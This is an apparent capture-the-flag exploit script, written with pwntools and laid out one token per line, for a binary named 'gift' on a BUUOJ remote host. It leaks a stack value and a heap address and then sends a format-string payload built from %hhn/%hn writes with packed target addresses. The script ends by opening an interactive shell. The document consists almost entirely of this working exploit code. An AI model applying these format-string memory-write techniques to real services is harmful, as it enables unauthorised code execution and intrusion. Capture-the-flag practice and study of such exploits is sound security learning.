from
pwn
import
*
from
hashlib
import
sha256
import
base64
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
r
=
process(
'./gift'
)
libc
=
ELF(
'./libc-2.23.so'
)
elf
=
ELF(
'./gift'
)
r
=
remote(
'node4.buuoj.cn'
,
28706
)
def
z():
gdb.attach(r)
if
__name__
=
=
'__main__'
:
print
(
'test1:'
+
hex
(elf.got[
'free'
]))
print
(
'test2:'
+
hex
(elf.got[
'puts'
]))
r.sendafter(
"What's your name?\n"
,'nameless')
r.recvuntil(
'nameless'
)
gift
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
log.success(
'gift:'
+
hex
(gift))
r.sendafter(
"Do you want it?\n"
,
'Yes\n'
)
r.recvuntil(
"Here is your gift:"
)
heap
=
int
(r.recvuntil(
'\n'
,drop
=
True
),
16
)
+
8
s1
=
heap
+
0x1a0
s2
=
s1
+
2
s3
=
s1
+
4
log.success(
'heap:'
+
hex
(heap))
a
=
gift>>
32
&
0xffff
b
=
gift>>
16
&
0xffff
c
=
gift &
0xffff
log.success(
'a:'
+
hex
(a))
log.success(
'b:'
+
hex
(b))
log.success(
'c:'
+
hex
(c))
pd
=
"%22$hhn%{}c%23$hn%{}c%24$hn%{}c%25$hn"
.
format
(a,b
-
a,c
-
b)
print
(
'len'
+
str
(
len
(pd)))
pd
=
pd.ljust(
0x50
,
'\x00'
)
+
p64(gift
-
8
)
+
p64(s3)
+
p64(s2)
+
p64(s1)
r.sendafter(
"Now,to find your flag in the gift!"
,pd)
r.interactive()